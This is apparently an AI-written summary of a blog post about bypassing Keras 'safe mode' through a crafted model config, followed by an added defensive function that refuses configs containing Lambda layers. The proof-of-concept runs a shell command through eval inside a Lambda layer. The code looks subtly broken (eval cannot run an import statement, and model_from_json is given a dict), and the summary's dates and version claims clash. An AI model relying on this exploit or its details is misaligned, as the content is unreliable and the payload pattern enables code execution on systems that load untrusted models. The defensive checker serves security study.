From this webpage screenshot, the following key information about the vulnerability can be extracted:

- **Title**: Is TensorFlow Keras "Safe Mode" Really Safe? Bypassing Safe Mode for Arbitrary Code Execution
- **Author**: Ryan Smith, published on September 18, 2023
- **Main Content**:
  - Describes a vulnerability in Keras's deserialization mechanism that allows attackers to bypass the "safe mode" and execute arbitrary code.
  - Provides example exploit code demonstrating how to exploit the vulnerability in Keras versions before and after 3.9.
  - Highlights security issues in Keras's deserialization mechanism and advises developers to be aware of the associated risks.
- **Key Code Snippet**:

```python
# Exploitation before Keras version 3.9
import keras
from keras.models import model_from_json

malicious_model = {
    'class_name': 'ExploitModel',
    'config': {
        'name': 'exploit_model',
        'layers': [
            {
                'class_name': 'InputLayer',
                'config': {
                    'batch_input_shape': [None, 1],
                    'dtype': 'float32',
                    'name': 'input_1'
                }
            },
            {
                'class_name': 'Lambda',
                'config': {
                    'function': 'lambda x: eval("import os; os.system(\'echo PWNED\')")',
                    'output_shape': [1]
                }
            }
        ]
    }
}

model = model_from_json(malicious_model)
```

- **Summary**:
  - The vulnerability exists in Keras's deserialization process, enabling attackers to execute arbitrary code by crafting malicious model configurations.
  - Developers are advised to implement additional security measures when handling untrusted model configurations to prevent such attacks.
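One such additional measure is to screen the model configuration yourself before handing it to Keras, rather than relying on safe mode alone. The following is an added example (not code from the write-up or from the Keras project) that walks a parsed model config, descends into nested sub-models, and refuses to load anything containing a `Lambda` layer; the `find_unsafe_layers` and `safe_model_from_json` names and the sample config are constructed for illustration.

```python
import json

# Layer classes whose config carries executable Python. "Lambda" is the class
# the write-up above abuses; extend the set to match your own loading policy.
UNSAFE_LAYER_CLASSES = frozenset({"Lambda"})


def find_unsafe_layers(config, path="model"):
    """Return the path of every layer in `config` whose class_name is unsafe.

    Nested models (a Functional/Sequential model used as a layer) are descended
    into, so a Lambda hidden inside an inner model is still reported."""
    hits = []
    if not isinstance(config, dict):
        return hits
    if config.get("class_name") in UNSAFE_LAYER_CLASSES:
        hits.append(path)
    layers = config.get("config", {}).get("layers") if isinstance(config.get("config"), dict) else None
    for i, layer in enumerate(layers or []):
        name = str(i)
        if isinstance(layer, dict) and isinstance(layer.get("config"), dict):
            name = layer["config"].get("name", name)
        hits.extend(find_unsafe_layers(layer, f"{path}/{name}"))
    return hits


def safe_model_from_json(json_string):
    """Parse a model config and raise ValueError if it contains unsafe layers.

    Returns the clean config dict; only then should it be passed to Keras."""
    config = json.loads(json_string)
    hits = find_unsafe_layers(config)
    if hits:
        raise ValueError("refusing to load model: unsafe layers at " + ", ".join(hits))
    return config


# Constructed sample mirroring the structure of the malicious config above,
# with the Lambda body replaced by an inert placeholder string.
SAMPLE_MALICIOUS = json.dumps({
    "class_name": "ExploitModel",
    "config": {"name": "exploit_model", "layers": [
        {"class_name": "InputLayer",
         "config": {"batch_input_shape": [None, 1], "dtype": "float32", "name": "input_1"}},
        {"class_name": "Lambda",
         "config": {"function": "<placeholder>", "output_shape": [1], "name": "lambda_1"}},
    ]},
})

if __name__ == "__main__":
    print(find_unsafe_layers(json.loads(SAMPLE_MALICIOUS)))  # ['model/lambda_1']
```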